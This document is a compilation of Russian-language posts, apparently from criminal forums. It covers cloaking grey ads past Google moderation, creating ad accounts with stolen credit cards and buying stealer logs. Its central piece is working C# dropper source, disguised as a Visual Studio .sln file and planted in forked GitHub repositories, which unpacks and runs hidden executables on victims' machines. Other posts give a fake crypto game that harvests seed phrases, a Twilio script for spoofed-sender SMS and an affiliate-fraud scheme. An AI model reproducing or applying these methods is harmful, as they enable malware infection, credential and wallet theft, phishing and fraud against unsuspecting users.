Есть 2 варианта написания текста тизерный и лайтовый.
Тизерный набирает больше цтр, лучше конвертит, но живет не долго так как
собирает жалобы.
Лайтовый конвертит хуже, но дольше живет так как не привлекает к себе
внимания. (иногда зависит от настроения гугла, когда пмс разницы нет, срок
жизни примерно одинаковый).
Пример тизерных креативов, обратите внимание что в тексте присутствуют
явные стоп слова и ложные обещания.
Рассмотрим более лайтовый пример, формулировка более лайтовая, нет
обещаний, и ложных призывов к действию. Картинки следует использовать
нейтральные. “Нейтральность” можно проверить на платформе Cloud Vision от
гугла. В других нишах (свипы, крипта) все гораздо проще, т.к нет явных стоп
слов.
В случае, если вашу объяву будут отклонят по юридическим требованиям добавляем в конец текста сноску “18+” Как одобрять объявы Для грамотного одобрения серой объявы, нам нужен релевантный вайт. В случае если вы скопировали сайт из выдачи на свой домен после настройки и пополнения кмс кампании (на серое), перед добавлением объявы отключить поиск, и в потоках ipv6, white page поменять схему на CURL и выбрать сайт подходящий под вашу нишу. Если вы решили сделать сайт на конструкторе после настройки и пополнения добавляем раздел/страницу на сайте с целевым контентом.
Например сайт про стройку, добавляем серую страницу и к ней подключаем клоаку.
В гугл добавляем ссылку вида домен.com/страница с
клоакой. Пример объявление ведет на страницу: Либо можно делать целевую
страницу и при модерации изменять код страницы сразу на главной странице
сайта, но будьте готовы к тому что такое объявление быстро отклонят и аккаунт
проживет не долго. Тем не менее отлить часть денег вы успеете (применимо к
адалту). Например: Изначально, был простой одностраничник с “онлайн
семинаром по курсам фитнеса”, после создания и настройки кмс, перед
добавлением объявы мы редактируем текст страницы, на нужный нам, и к
кнопке привязываем ссылку на трекер.
Если сайт сделан на Wordpress делаем мини портал на любую тему, после настроек, создаем пост на сайте (прячем вниз, или на 2-3 страницу), в самом посте пишем релевантный текст, и подключаем клоаку. В гугл добавляем ссылку вида домен.com/ пост клоакой Данный способ самый надежный, благодаря нему хорошо аппрувится нутра. Не забываем про “Политику конфиденциальности” и “Пользовательское соглашение” в футере сайта. Как ускорить апрув адаптивных объявлений? (применимо к 2 и 3 способу) Ваша белая страница должна содержать картинки и слова вашего будущего объявления. После того как вы добавляете ссылку в объявление, бот гугла сканирует вашу страницу и предложит сам вашу картинку, которую и нужно добавить. Так же стоковые картинки из библиотеки гугла проходят модерацию без проблем. Примеры категорий сайтов под нутраниши: суставы йога, массаж грибок ногтей услуги маникюрапедикюра потенция тренажерный зал, семинары по отношениям В целом фантазия не ограничена, тематику можно брать любую (лучше бизнесовую), а потом вставлять страницу с нужным вам контентом и все.
Вам понадобиться забаненный аккаунт. Обязательно не закрытый. В поисковой кампании создаем текстовые объявления с нужными вам словами. Ждем до 20 минут. Если объявление одобрилось быстро все в порядке. Если ваше объявление отклониться сработало стоп слово. Долгое рассмотрение так же свидетельствует о наличии запрещенных слов. (сработал триггер и текст улетел на ручное рассмотрение). База стоп слов гугла обновляется и “чиститься” каждые примерно 3 месяца. То что не работает сейчас, может сработать потом. (применимо к лайтовым стоп словам, не таким как казино и тд) Альтернативный способ проверки создаем аккаунт с трастовым домено и добавляем серую объяву. Если аккаунт забанят проблема в объяве, если нет все в порядке. Релевантность обьявления Задумывались ли вы когда-либо, почему одни компании в восторге от Google Ads и называют его самым лучшим рекламным инструментом, а другие утверждают, что это бесполезная трата денег и они не получили ни единой продажи? Что отличает обожателей и ненавистников Google Ads? Наличие сквозной релевантности. Давайте разбираться, что это значит. Википедия говорит, что релевантность — это степень соответствия найденного информационным запросам пользователя.
Таким образом, если человек ищет “Юрист по наследству”, то релевантное
запросу объявление будет выглядеть вот так:
А нерелевантное вот так:
Нерелевантное запросу объявление может задушить всю вашу рекламную кампанию
еще в зародыше. По рекламе просто не будут кликать, считая, что она не
соответствует запросу.
Релевантность объявлений достигается разделением Ключевых слов на
Группы и созданием для каждой группы отдельного объявления, которое
полностью соответствует намерению пользователя.
Плохой, но очень распространенный, подход к рекламе — выписать все
пришедшие в голову ключевые слова, например:
• юрист в Киеве;
• юрист по наследству;
• трудовое право;
• юрист для бизнеса;
• адвокат по уголовным делам.
Нерелевантное запросу объявление может задушить всю вашу
рекламную кампанию еще в зародыше
И создать на все эти ключевые слова одно объявление. Что бы человек не
искал, он видит его:
Правильный подход к рекламе — разделить ключевые слова на группы
объявлений, не забывая о типах соответствия, которые мы обсуждали раньше.
Для каждой группы написать свое объявление, используя ключевые слова в
тексте. В таком случае вы сможете обеспечить показ объявлений в соответствии с
намерениями каждого пользователя. Показатели эффективности у таких объявлений
будут куда выше.
Когда человек уже кликнул по объявлению “Лучшие юристы по наследству”, он
тоже может попасть как на релевантную посадочную страницу:
Так и на главную. Множество рекламодателей просто указывают
адрес сайта в качестве посадочной страницы, ожидая, что пользователи сами
найдут нужную им информацию.
В
случае с нерелевантной посадочной страницей вы будете
сливать свой бюджет на клики, после которых люди закрывают
вашу страницу и уходят на другие сайты.
Выглядит это зачастую вот так:
Но пользователи даже не станут искать, они просто закроют вашу страницу и
перейдут к конкурентам. Избыток информации порождает полное нежелание
читать и анализировать. Ведь проще просто посмотреть в другом месте. В
случае с нерелевантной посадочной страницей вы будете сливать свой бюджет
на клики, после которых люди закрывают вашу
страницу и уходят на другие сайты. Релевантность посадочных страниц
достигается за счет той же группировки ключевых слов и назначения каждому
объявлению своей посадочной страницы, которая продолжает мысль,
заложенную в объявлении.
Секрет эффективности каждого показа рекламы — Сквозная релевантность
поиска (Запрос — Объявление — Посадочная).
Релевантное объявление должно содержать информацию,
непосредственно касающуюся ключевого слова, по которому
осуществляется показ.
Релевантная посадочная страница должна предлагать конкретное решение
проблемы пользователя на одной странице, без необходимости искать
информацию.
Задавайте вопросы , с радость ответим
CTR (Кликабельность) - количество кликов по объявлению разделенное на количество показов
Географический таргетинг (Местоположения) - где должны находиться люди, которые будут видеть ваши объявления (страна, регион, город, район, радиус вокруг точки на карте)
Группа объявлений - содержит одно или несколько объявлений и ориентирована на один набор ключевых слов
Дневной бюджет - сумма, которую вы готовы потратить за рекламу в день (Google имеет право превысить его в 2 раза)
Ключевое слово - инструкция для подбора поисковых запросов, по которым показывать вашу рекламу
Конверсия - важное для бизнеса действие, которое пользователь выполняет на вашем сайте (покупка, заказ, просмотр цен, …)
Минус-слово - слово, при наличии которого в поисковом запросе, ваше объявление не будет показано
Поисковый запрос - слово или фраза, которую люди используют, чтобы найти ваш продукт или услугу в Google
Показатель качества (QS) - оценка от 1 до 10, которую Google присваивает каждому ключевому слову. Включается в разделе Ключевые слова: Столбцы → Изменить столбцы → Показатель качества Показы - сколько раз ваше объявление было показано пользователям Ставка по умолчанию
(Максимальная цена за клик) - максимальная сумма, которую вы готовы платить за каждый клик по объявлению
Цена за клик (CPC) - сумма, которую вы платите каждый раз, когда человек нажимает на ваше объявление
Языковой таргетинг (Языки) - на каком языке должны быть устройства или
запросы пользователей
Всегда выбираем “Не указывая цель”, так будет больше настроек
Тип кампании Поиск (Search)
Даем осмысленное название кампании
Отключаем “Поисковых партнеров” и “Контекстно-медийную сеть”
Выбираем географический таргетинг (только те которые находся в данном
гео )
Выбираем языковой таргетинг
Задайте дневной бюджет кампании (на свежих аккаунтах советую ставить бюджет до 20$)
Выбираем стратегию назначения ставок (первую кампанию советую ставка максимальное к-во кликов)
Даем название группе объявлений
Назначаем ставку по умолчанию
Вводим ключевые слова
Пишем текст объявления
Создаем расширения объявлений
Анализируем и оптимизируем
Классификация типов рекламных кампаний в Google Ads
Стратегии назначения ставок в Google Ads
Цель: Показать ваше объявление как можно чаще.
Когда использовать: Не рекомендуется, так как может привести к неоправданно высоким затратам.
Ключевые слова — это фундамент вашей рекламной кампании в Google Ads. Они определяют, по каким поисковым запросам пользователи увидят ваше объявление. Правильный подбор ключевых слов напрямую влияет на эффективность вашей рекламы и стоимость кликов.
1. Анализ целевой аудитории и продукта:
* **Что ищут ваши потенциальные клиенты?** Составьте список услуг или товаров, которые вы предлагаете.
* **Какие проблемы они хотят решить?** Подумайте, какие вопросы задают ваши клиенты.
* **Как они описывают ваш продукт или услугу?** Изучите отзывы, поисковые запросы конкурентов.
* **2\. Использование инструментов:**
* **Планировщик ключевых слов Google:** Помогает найти новые идеи для ключевых слов и оценить их популярность.
* **Сервисы анализа конкурентов:** Позволяют увидеть, какие ключевые слова используют ваши конкуренты.
* **3\. Типы соответствия ключевых слов:**
* **Точное совпадение:** Ваши объявления будут показаны только по точным совпадениям с ключевым словом или его близким вариантам. Например, [купить кроссовки Nike].
* **Фразовое совпадение:** Ваши объявления будут показаны по запросам, содержащим ключевое слово в точном порядке или с добавлением других слов до и после него. Например, "купить кроссовки Nike".
* **Общее совпадение:** Ваши объявления могут быть показаны по широкому спектру запросов, связанных с вашим ключевым словом. Например, купить кроссовки.
* ### Показатель качества, **QS**
1. Ожидаемый CTR
1. Соответствие объявления запросу
2. Положение на странице результатов поиска
3. Заметность объявления при беглом взгляде
2. Релевантность объявления
1. Наличие ключевых слов в объявления
2. Проработка ключевых слов
3. Разбивка ключевых слов на группы
3. Качество целевой страницы
1. Наличие ключевых слов на странице
2. МЕТА-теги в коде странице
3. Поведенческие факторы
*
* Дополнительная ссылка - ссылки на другие полезные страницы вашего сайта
* Уточнение - дополнительная информация в тексте объявления
* Структурированное описание - описания товаров/услуг, разбитые на категории
* Изображение - возможность использования картинок в объявлении (не всегда доступно)
* Номера телефонов - добавляет кнопку “Позвонить” на мобильных устройствах
* Форма для клиентов - поля для получения контактов клиента (не всегда доступно)
* Адрес - отображает ваш адрес после верификации в Google My Business
* Партнерские адреса - точки продажи вашей продукции (не везде доступно)
* Цена - показывает в объявлении стоимость ваших товаров или услуг
* Ссылки на приложения - добавляет ссылку на ваше приложении Android/iOS
* Промоакция - добавляет в объявление информацию о скидках
*
* Повышайте свой Показатель качества до 10 для экономии на каждом клике
* Регулярно проверяйте отчет “Поисковые запросы” и пополняйте свои минус-слова, чтобы убрать нежелательные запросы
* Переносите неэффективные ключевые слова в новые группы и создавайте под них более релевантные объявления
* Непрерывно тестируйте разные тексты объявлений для повышения эффективности
* Настройте отслеживание конверсий, чтобы знать, какая реклама приносит заказы, а не просто клики
* Корректируйте ставки по:
* Ключевым словам в зависимости от их конверсии в заказ
* Регионам, городам, районам, которые приносят больше заказов
* Время суток и дню недели, когда наибольшее кол-во заказов
* Для устройств (мобильные, планшеты, ПК), с которых больше заказов
Ждем коментариев от вас по нашей подсказке ) Надеюсь она вам будет полезна
Все обитателям данного уважаемого форума доброго времени суток.
хочу написать авторскую небольшую статью как создавать аккаунты Google Ads и не тратить большие бабки на покупку аков или много времени для их создания.
с ванючим гуглом борюсь уже лет 5 =) за это время уже не плохо понял его.
естественно с гуглом главное это найти офер. есть направления в которые лучше
не лезть а есть куда можно и полезть.
но для того чтобы найти куда залезть у тебя должны быть аккаунты гугла для
теста.
покупать их выходит в копеечку да и жаба душит. поэтому друг чтобы начать
развиваться в гугле тебе нужно уметь делать аки и желательно быстро. а то
сидишь 2-3 недели фармишь а у тебя потом аки из блоков не выходят))
такое небольшое предисловие.
есть 2 варика это лить за свои (сумасшедшие люди) это хорошо когда уже нашел офер который приносит тебе прибыль и ты сидишь только цц пополняешь когда надо пополнить рекламный кабинет и считай у тебя 1 ак может и год и 3 лить. будешь сидеть в шоколаде и тупить) но такое бывает редко
второй варик это карж платежка. цц или че там еще есть. всякое разное
для тестов нам нужны аки с карж цц. чтобы понять вообще конвертит офер или нет
и так к делу.
далее уже потом надо будет проходить всякие блоки и так далее
с таким способом на 100 баксов. если вы найдете хорошего поставщика цц и нормлаьный бин сможете делать по 5-7 аков. дешево и сердито как говорится. если будет настроение потом расскажу как верифать аки и как проходить блоки
есть вопросы пишите звоните =)
Hello
Can you recommend me any decent store or any decent vendor selling stealer logs ?
Genesis is dead more then one year, but I remember back earlier there were dozens of private sellers, selling logs from Redline, Raccoon, Luma...
Now I can't see one
Only log clouds, which are shared among many users, which make them almost
useless.
I am looking for some specific logs, not something uncommon, but want them
fresh and not also used by others.
Various different logs, but Coinbase more then anything I am looking for
Pm for Telegram/session and so
Можете пожалуйста подсказать различные виды трафика (не залив на дефолтный тик ток или инсту) на гемблинг (Ну где можно найти лудиков и тд)
Подробный гайд по работе с дроп доменами (2023)
В документе объясняются все нюансы грамотного подбора дроп доменов и
работа с ними. Дается множество сервисов, приводятся кейсы и различные
стратегии.
You must have at least 1 reaction(s) to view the content.
Автор CyberKayt
Источник https://xss.is
Сразу скажу что данный метод уже используют на всю катушку, видел да же писали
в новостях на хакере что то подобное, но не где о нем подробно не чего не
описано, решил проверить способ и усовершенствовать его.
Инсталы идут и довольно качественные, плюс метод довольно простой, но я его
усложнил сделал более незаметным и нам понадобятся хотя бы начальные знания
C# и BAS - для овтаматизации процессов в браузере или если сможете переписать
на другой ЯП очень простую софтинку о которой реч пойдет ниже.
Подготовка вашей полезной нагрузки
Предположим что у вас уже готовый криптованный exe файл, для начала нужно
обязательно сделать ему папм пустыми байтами до 750+ мб.
Качаем архиватор, предпочтительно 7zip: https://www.7-zip.org/download.html
И сжимаем ваш криптованный файл на максимальном сжатии:
Получаем архив с паролем your_password весом почти как ваш изначальный exe
без пампа и переименуем его включая расширение например: vsconfig.tmp
Таких файлов мы можем создать сколько угодно с разными exe. главное расширение
.tmp и везде 1 пароль, либо положить в 1 архив кучу разных exe, наш софт
запустит все.
Отложим пока наш архив в сторонку и подготовим софт для распаковки и запуска о котором говорил в начале, это основа и по сути сама суть моей статьи.
Я буду писать на C#, софт довольно простой и переписать его другой ЯП труда не составит, готовый код ниже:
C#:Copy to clipboard
using Ionic.Zip;
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Windows.Forms;
namespace UnZip
{
internal class Program
{
public static string password = "your_password"; // Пароль от архивов
private static string STRING = "abcdefghijklmnopqrstuvwxyz";
private static string INTEGER = "0123456789";
private static Random charsRandom = new Random();
private static Random lengthRandom = new Random();
public static string Random(int length = 0)
{
if (length == 0) length = 30;
lengthRandom.Next(1, length);
string chars = STRING.ToUpper() + STRING + INTEGER;
return new string(Enumerable.Repeat(chars, length).Select(s => s[charsRandom.Next(s.Length)]).ToArray());
}
static void Main()
{
// Ищем все файлы sln и запускаем, а так же все архивы с форматом .tmp которые распакуем во временную папку и запустим все exe файлы в них.
string[] AllFilesSLN = Directory.GetFiles(Application.StartupPath, "*.sln*", SearchOption.AllDirectories);
string[] AllFilesZIP = Directory.GetFiles(Application.StartupPath, "*.tmp*", SearchOption.AllDirectories);
foreach (string filenameSLN in AllFilesSLN)
{
try
{
string sln_file = Path.Combine(Application.StartupPath, Path.GetFileNameWithoutExtension(System.Reflection.Assembly.GetExecutingAssembly().Location) + ".sln");
File.Move(filenameSLN, sln_file);
Process.Start(sln_file);
}
catch (Exception ex) { Console.WriteLine(ex);}
break;
}
// Ищем все архивы и распаковываем
foreach (string filenameZIP in AllFilesZIP)
{
try
{
string p = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Random(16));
string pathzip = Path.GetDirectoryName(filenameZIP);
using (ZipFile zip = ZipFile.Read(filenameZIP))
{
if (!Directory.Exists(p))
Directory.CreateDirectory(p);
zip.Password = password;
zip.ExtractAll(p);
string[] exe = Directory.GetFiles(p, "*.*", SearchOption.AllDirectories);
foreach (string name_exe in exe)
Process.Start(name_exe);
}
}
catch (Exception ex) { Console.WriteLine(ex); }
}
}
}
}
Не забудьте указать в коде пароль на ваш архив.
Устанавливаем пакет DotNetZip из NuGet, он нам необходим для распаковки zip
архива с паролем.
Не используйте Fody например для добавления dll в exe, это навешает детектов
(проверенно!) лучше просто положить dll рядом. Думаю такая dll не вызовет
подозрений.
Разберем код
Собираем проект.
Обязательно делаем файлу иконку проекта Visual Studio .sln иконку прикрепил к
теме в zip архиве так как .ico формат залить нельзя.
А теперь маскируем формат под .sln, для начала изменить реальный формат exe на scr, а теперь самое главно копируем строку ниже именно копируем, а не переписываем:
Resounls..scr.exe
Символы которые можно изменить Resou остальное оставляем как есть!
Должно получится вот так:
Визуально тот же .sln файл запуска проекта.
Заливаем на VT? Да заливаем в этом и фишка что лить будут такой простой без
малвари файл. Его все равно сольют а для статьи как раз посмотрим сколько
детектов накапает.
Без обфускации как есть:
analysis/ZDRjMmZmOWNiZDg3NDA1YTNjMGU4ZDBkMjAxYThlN2U6MTcxODMyNTgyMQ==)
VirusTotal
![www.virustotal.com](/proxy.php?image=https%3A%2F%2Fwww.virustotal.com%2Fgui%2Ffile- analysis%2FZDRjMmZmOWNiZDg3NDA1YTNjMGU4ZDBkMjAxYThlN2U6MTcxODMyNTgyMQ%3D%3D%2Fimages%2Ffavicon.svg&hash=94626aac1d4fb0d94d613e00d6573679&return_error=1) www.virustotal.com
Сразу после залива полный фуд по ВТ как будет дальше посмотрим(следим за
темой):
Готовим репозиторий
Регаем аккаунт GitHub идем в поиск и ищем какой ни будь репозиторий по своей
тематики, читы, крипта или что вам нужно.
Репозиторий ищем обязательно с проектом на Visual Studio где для запуска
проекта требуется .sln файл.
Далее для примера я буду использовать этот:
Делаем форк этого репозитория и следуем пунктам:
1. Переносим реальный файл .sln в данном примере CSharp-CheatSheet.sln в
подпапку например в уже существующую CSharp-CheatSheet что бы это сделать
скачайте сначало оригинальный .sln, удалите его из корня, перейдите в папку
CSharp-CheatSheet и закачайте туда.
2. В место него ложим в корень наши файлы:
vsconfig.tmp - В котором ваш криптованный exe его не обязательно ложить в корень, можно так же спрятать в подпапку CSharp-CheatSheet наш софт его все равно найдет и распакует.
Обязательно библиотеку DotNetZip.dll без нее не будет работать наш софт!
и сам фейковый фай Resounls..scr.exe
Внимание фейковый файл .sln и библиотека DotNetZip должны быть рядом.Click to expand...
Вот как это выглядит у меня:
Все готово! Почти. Сам репозиторий уже готов и его можно рекламить.
При скачивании проекта жертва запустит фейковый .sln файл который запустит
оригинальный .sln и откроет проект.
Распакует ваш архив с паролем и запустит все exe из него.
Держим в топе в поиске наш репозиторий что бы получить больше установок:
При поиске репозиториев многие фильтруют поиск по последним изменениям,
добавлениям, этим мы и воспользуемся!
Создаем в корне нашего проекта любой файл, его мы будем редактировать каждые
30сек. тем самым держа в топе поиске по этим критериям.
Запускаем BAS https://bablosoft.com/shop/BrowserAutomationStudio
Первым делом нам нужно получить свои куки от гита что бы работать с нашим
репозиторием:
Создаем пустой txt файл где угодно в него мы запишем наши куки.
В BAS жмем Браузер > Загрузить вводим сайт GitHub, после жмем F2 и
сможем работать напрямую мышкой в загрузившимся окне. Авторизируемся в своем
аккаунте гита.
Далее жмем Сеть > Сохранить cookies
Сохраняем куки в файл, для этого идем в Файловая система > Записать в файл
Откройте ваш txt файл проверьте записались ли туда данные, если все ок закрывайте BAS (Остановить)
Создаем новый проект уже для непосредственного апа нашего репозитория,
посредством редактирования файла.
Делаем все по пунктам:
Файловая система > читать файл указваем путь до нашего файла с куками.
Сеть > Загрузить cookies
И как до этого открывваем сайт гитхаба но уже ссылокй на файл для
редактирования Браузер > Загрузить, и после загрузки вы уже должны быть
авторизированны!
Жмете на карандаш справа редактировать файл повится окошко выбираете
кликнуть по эллементу , далее в поле редактирования щелкаете еще раз и
жмете ввод текста текст установите любой, хоть точку.
И далее все по аналогии сохраняем кликаем по эллементу.
Делаем задержку**Ожидание > Спать **поставим например 20 000млс.
И самое главное делаем пвторение скрипта:
Если кому то понадобится могу за $ написать скрипт для работы с вашими куками
и апом репозиториев по списку если из много.
В принципе такое сможет сделать любой кодер BAS это не сложно.
Сохраняйте и запускайте скрипт желательно на каком либо сервере что бы работал нонстоп не мешая вам.
После ваш фейковый репозиторий будет в топе подымаясь каждые 20 сек!По статистике мой софт проработал чуть менее суток я получил около 20 инсталов.
Click to expand...
Пусть не много но таких репозиториев можно понаделать кучу.
Так же я советую накрутить звезд, такие услуги я видел по форумам, это придаст доверия к вашему репозиторию.
Находил я и способы пролива через события сборки, не знаю на сколько это лучше или хуже, но думаю использование событий и того же повершела даст много детектов. Да и в реализации это сложнее хоть и менее палевно, решать и делать выводы только вам.
Click to expand...
Всем спасибо. Не забываем про наш ВТ выше) посмотрим скок проживет.
Специально для xss.is, автор CyberKayt
Доброго времени суток. Моя первая статья на данном форуме, так как ранее я
обитал только на экспе.
Недавно решил вспомнить былое, как работал в unreal engine (в разделе
архитектура)
Так как ранее держал фирму для подтверждения доходов на данную тематику и тут
в голову пришла мысль: "А почему не попробовать сделать скам игры для сидок
или для сбора каких либо данных. Ну на край сделаю проброс на сайт".
Вначале начал шерстить интернет, на похожие вещи, может быть кто-то додумался
до таких банальных вещей еще до меня, но полазив в инете по рекламе и по
баннерам на куче сайтов так ничего и не нашел. Значит можно приступать и
тестировать.
Игру не стал собирать супер пупер, брал direct x11 и минимальные требования на
2 гб видео. Видосы и прочий материал, тупо брал с топ сайтов с порно (хз решил
попробовать сделать игру на дрочерскую тематику), хотя первый трай я не успел
ни заскринить, ни собрать инфу для статьи, то будет рассматривать мат с
дрочерами.
Spoiler: Скрины шаблона
Собрал небольшую сценку, сделал несколько HUD сделал таблицы, сделал запросы на сервера, подключил MySql сделал правила для заполнения форм, прикрепил библиотеку Bip39 (в первый раз я этого не делал и было очень много мусора) чтобы не вставляли мусор и погнали.
Плюс данного способа в том, что можно делать белый сайт и не заморачиваться с клоаками и прочими методами защиты и обхода, так как у нас по сути чисто белая игра с чистым сайтом (я в этот раз сделал просто уник многостраничник). Так как через гугл практически невозможно запустить Adult рекламу, я начал думать по поводу тизерок и наткнулся на довольно неплохую как мне показалось, даже была оплата криптой. Называлась она TwinRed, как по мне подходила идеально, но со временем смотря на стату, начал понимать, что там стоят либо кликеры, либо сайт выдает просто конченную стату. Пошел искать нормальную тизерку и по итогу наткнулся на то что искал. Тизерная сеть (разумеется сливать ее не буду, так как зачем мне соседи) которая в жопе всех рейтингов, решил попробовать и ее тоже, так как понравился их дизайн и система рейтингов, что рекламодатели ставят оценки сайтам, где закупали рекламу.
Закинул туда для тестов 2500 usd и начал пролив.
Проект собрал в этот раз намного меньше всего 115 мб (в первый раз сцены были овер большие), сделал менюшки и прочие мелочи.
Spoiler: Скрин меню игры
Проект получился до ужаса смешной, но по сути выглядело нормально. Видос
примера можно глянуть тут: https://t.me/mylittleponyfuckcrypto/59
Суть в том, то что тут было нормальная модерация для сайтов и так как я понял, тизерка является на данный момент новой и они следят за то чтобы вебмастера не накручивали себе стату. Пошла жара.
Spoiler: Добыча
Выхлоп по итогу получился довольно неплохой и в целом я остался доволен. Так что на данный момент крипто игры довольно новая тематика и пока еще не заезжана.
Коллеги, есть необходимость регулярной рассылки по 10-30 номеров, и важно, очень важно чтобы была возможность выбора своего имени или номера отправителя.
Подскажите сервис пжста который такое предоставляет. И да, с оплатой в крипте.
Автор: learner
Источник: https://xss.is
Подобно сотням, если не тысячам парней, которые бросились кликать по этой
статье, увидев заголовок, я провел месяцы, исследуя этот знаменитый метод
массовой рассылки смс-подделок, и должен сказать, что очень гордился собой,
когда мне удалось найти его самостоятельно.
Для начала воспользуемся услугами компании, предлагающей услуги sms-
маркетинга. (twilio.com), знакомство закончено, можно переходить к делу.
Создание и настройка учетной записи
Чтобы создать учетную запись на twilio, вам понадобится номер телефона без
VoIP и адрес электронной почты.
Перейдите на сайт twilio, нажмите «Начать бесплатно».
PS: если вы создадите учетную запись из США, вы получите право на пробный
баланс в размере 15 долларов США, что позволит вам купить номер бесплатно.
пойдем
Выполняйте все шаги при регистрации, пока не попадете сюда
Заполните параметры, как показано на скриншоте выше.
Мы хотим использовать twilio для отправки смс.
СМС служат нам для саморекламы,
Мы хотим собрать twilio с минимумом кода и хотим разместить свой собственный
код.
Выбираем язык программирования, который хотели бы использовать, в моем случае
это python
Эта информация важна, потому что она определяет параметры, которые
впоследствии появятся на панели инструментов.
как только вы закончите, вы увидите консоль twilio.
затем нажмите на Phone Number >Manage>Buy a number
Выбрать номер телефона, в моем случае я взял американский номер, обязательно выбрать номер с возможностью отправки смс.
и купи это
Как только это будет сделано
входить Messaging >Send an SMS
Я пропустил шаг, где вы должны активировать систему обмена сообщениями перед
выполнением теста, но это нормально, есть тысячи руководств о том, как
открыть, загрузить и активировать вашу учетную запись twilio на YouTube,
Вы обязательно должны выполнить этот тест, чтобы убедиться, что все работает
правильно, прежде чем двигаться дальше.
Я сделал этот шаг создания только в отношении выбора опций и определенных настроек.
На этом уровне вы можете отправлять смс только на номер вашей страны регистрации, чтобы исправить это и иметь возможность отправлять смс в любой другой пункт назначения по нашему выбору, мы внесем небольшие коррективы.
входить settings >Geo Permissions
и активируйте все страны, куда вы хотите отправить смс
теперь иди Account >Keys & Credentials>Api Keys and Tokens
Когда вы там, нас интересуют две вещи: ваш ключ "Account SID" и ваш "Auth
Token", поэтому мы скопируем и вставим их в безопасное место.
как только это будет сделано, мы можем выйти из twilio
Отправка поддельных SMS
возьмите этот код и сохраните его в файле python
Python:Copy to clipboard
from twilio.rest import Client
account_sid = 'ACdfab093dca939064****************'
auth_token = '9f338367a0*************************'
client = Client(account_sid, auth_token)
message = client.messages.create(
from_='tatsuya',
body='Please Change your address and redeliver',
to='+*************'
)
print(message.sid)
введите свой SID и токен авторизации, выберите номер получателя (кому) в международном формате (+********...) имя эмитента, в моем случае это tatsuya и сохраните файл
откройте свой файл в командной строке и введите следующую командуpython
ss.py
конечно, если вы назвали свой файл Python «ss», как в случае со мной
нажми ввод и вуаля
На этом уровне все ок и можно переходить к чему-то еще более интересному
Массовая поддельная смс
вот скрипт, который позволит нам отправлять массовые смс
You must spend at least 365 day(s) on the forum to view the content.
сохраните этот скрипт в файле, в моем случае я назвал его sms.py, затем сохраните список номеров в CSV-файле, переименуйте «participants», сделайте то же самое с txt-файлом, который вы переименуете в «message», и поместите их все в та же папка, что и на следующих сс. Это просто деталь для тех, кто работает с питоном
модифицируйте скрипт, добавив свой SID, Auth Token, имя отправителя в моем случае UBS
скопируйте и вставьте свое сообщение в текстовый файл
открываем наш файл в командной строке
и запустить
подтвердите, и вы увидите, что ваш список номеров начинает прокручиваться каждый раз, когда отправляется смс, и все
**можно отправлять смс со ссылками и медиа, но мы ограничимся отправкой смс со ссылками. В общем все ссылки работают
Мой опыт с твило
Twilio, возможно, является одним из лучших смс-шлюзов, но очень сложно создать
пригодную для использования учетную запись, если бы это было несколько месяцев
назад, я бы сказал вам, что лучшее место для создания учетных записей twilio —
это США, но сегодня все стало еще больше. сложно, в частности из-за A2P 10DLC,
которое сейчас требуется от любой компании, которая собирается отправлять смс
в США.
НО ЧТО ВАЖНО И ЧТО ВЫ ДОЛЖНЫ ЗНАТЬ, ТАК И то, что когда вы создадите учетную
запись и планируете отправлять смс в такую-то страну, я посоветую вам создать
учетную запись в стране, на которую вы ориентируетесь, это будет проще и менее
вероятно. сделать ваш аккаунт подозрительным и потерять его.
Чтобы увеличить срок жизни вашей учетной записи, привяжите ее к существующему
сайту, которым вы можете управлять и чья сфера деятельности может оправдать
вашу массовую рассылку SMS.
Упс есть маленькая деталь которую забыл, иногда на некоторых телефонах андроид
и ios сообщения не приходят а показывают что пропало, эдакое ложное
срабатывание
Я никогда не понимал причину, но я сказал себе, что это наверняка брандмауэр
или что-то в этом роде, не путать с смс, которые сохраняются как спам в вашем
почтовом ящике, может быть, кто-то из более опытных в GSM мог бы мне
объяснить**
Если вы зашли так далеко, спасибо за чтение, и если вам понравилось, я попрошу вас оставить как можно больше отзывов и комментариев. **_TATSUYA
_**
Сначала разберем чем будем заниматься:
Мы будем закупать ОЧЕНЬ дешевый трафик и выдавать его за качественный, тем
самым будем фродить партнерскую программу (оффер).
Разберем это на реальном моем примере. Данный способ был выкуплен за 450$ у
одного из селлеров с ПБ, **однако вся статья написана на моем личном опыте,
скринами профитов и трудностями о которых вам вряд ли расскажут подобные
темщики.
Приступим.**
1. Подготовка аккаунтов на ПП
**
Рассмотрим две ПП с которыми я работал, и проверил:**
- www.admitad.com
- leads.su
**
Проходим регистрацию (admitad)**
Нажимаем на кнопку "Стать веб-мастером" проходим типичную регу.
Далее необходимо добавить рекламные площадки, делается достаточно просто:
Далее...
Потом вас попросят указать ссылки на данные площадки, указываете стандартные:
ads.google.com, vk.com и т.п
**
Как только вы подключили площадки (это происходит мгновенно), переходим к
выбору CPA программ для них.**
_
В моем примере, я использовал СРА программы дебетовых карт РФ. Далее поймете
почему_
Переходим к поиску программ и выбираем по фильтрам "Дебетовые карты":
Далее подключаем несколько программ на выбор, на что стоит смотреть, так это на действия для подтверждения лида, классика это активация карты (пополнение карты на определенную сумму, обычно 500-1000 рублей и трата этих денег в магазине допустим), если есть условие, что лид должен оплатить допустим 3000 рублей для открытия карты, не рассматривайте такие программы. Покажу на примере:
Можем увидеть:
Тариф - 2280 рублей за выданную карту с активацией.
Условия активации: 1000 рублей потраченные с карты через POS-терминалы.
В данном случае нас все устраивает, нажимаем на кнопку снизу "Подключиться".
Вас попросит отправить сопроводительное письмо, пишем что-то аналогичное этому:
Code:Copy to clipboard
Я занимаюсь таргетированной
рекламой в вк уже больше двух лет. Самый низкий мой клик был 0,78 рубля. Планирую
лить на дебетовые карты, предварительно тестовые объявления, далее лучшие, сбор
аудитории, анализ, добив и т.д + ко всему запущу рекламу Google ADS. Так же арбитраж по
закупке трафика никто не отменял, те же YouTube каналы и тому подобное.
Текст необходимо слегка изменить, важно, обратите внимание на запрещенные источники трафика в данной программе, их не стоит упоминать в письме.
Далее подключаем все возможные программы которые вам доступы и подходят под наши критерии, 4-5 штук будет достаточно.
Как только вы подадите заявку на подключение вам будет необходимо дождаться модерации (от 3-5 дней), можете не переживать модерацию проходят все.
После прохождения модерации, собираем ваши партнерские ссылки с каждого подключенного оффера.
Жмем на кнопку "Рекламные материалы" и копируем ссылку, все ссылки сократите
это важно , я использовал vk.cc
Все ссылки с названиями оффера стоит записать в блокнот.
2. Добываем дешевых лидов из Telegram
